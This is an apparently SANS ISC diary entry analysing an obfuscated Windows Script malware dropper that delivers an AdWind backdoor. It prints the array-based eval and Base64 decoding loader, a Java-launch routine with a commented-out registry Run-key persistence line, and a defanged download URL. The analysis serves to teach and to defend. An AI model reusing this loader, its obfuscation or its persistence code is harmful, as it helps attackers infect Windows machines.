My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

If You Want Something Done Right, You Have To Do It Yourself... Malware Too!

Published: 2020-07-08. Last Updated: 2020-07-08 05:13:33 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker's idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC ….”;
return [function(){
eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is a language very permissive regarding data types and you can mix functions and strings in the same array. The first element of the array Kerozene[] is a function that deobfuscates a very long string that is also polluted with character substitutions. Once replaced, these characters with the right one, you can decode the Base64 string and get the second payload. The other elements are in a second array with some hex-encoded elements Then the following code is executed:

Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]]. (Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to elements of the array are replaced by their value during the execution. Example:

WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")

becomes:

WSH[CreateOject("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of "help yourself". The interesting function is GrabJreFromNet() which tries to download a Java Runtime Environment if not already installed on the victim's computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect if Java is available or not:

var text = "";
try {
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
    if (text != "") {
      text = text + "\\bin\\javaw.exe";
    }
  }
  else {
    text = text + "\\bin\\javaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");
    wshShell.run ("\"" + text + "\" -jar \"" + stubpath + "\"");
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments

A "nice" piece of malware, particular the way to launch it: e04b03e82077329bfcc5b0aae31a931b6306927b39fac83104fc81efc92d7b59
(from malware-baazar)

Diary Archives